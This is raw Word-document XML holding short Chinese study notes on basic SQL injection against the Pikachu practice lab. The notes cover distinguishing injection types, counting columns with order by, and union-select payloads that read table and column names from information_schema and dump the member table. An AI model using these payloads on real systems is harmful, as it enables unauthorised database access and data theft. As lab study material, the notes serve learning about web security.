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3BD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Sql注入基础：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B4B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首先判断是字符型还是数字型，判断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)个数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8AF7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使用order by判断字段数，</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A8A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用union select联合查询database()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABD9B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查询表名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF90FD9"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union select1,group_concat(table_name) from information_schema.tables where table_schema='pikachu' %23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DC88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查询列名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5105DB63"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group_concat(column_name) from information_schema.columns where table_name='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>member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'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 xml:space="preserve"> %23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423A1841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之后就可以查看该数据库东东了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182EADA9"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group_concat(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>***，**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 xml:space="preserve">) from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>member %23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332DA"/>
    <w:rsid w:val="6C3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2025-04-14T09:38:30Z</dcterms:created>
  <dc:creator>86139</dc:creator>
  <cp:lastModifiedBy>唯吾所动</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-14T09:47:30Z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eyJoZGlkIjoiNWU3NDlmOGM3MDU1NDA5NTUxZTVlMWRlMDBkMzNkYzgiLCJ1c2VySWQiOiI0NTI5Mjc1MTMifQ==</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>7F849AAF051E4F6E8D62AF419637C03C_12</vt:lpwstr>
  </property>
</Properties>
</file>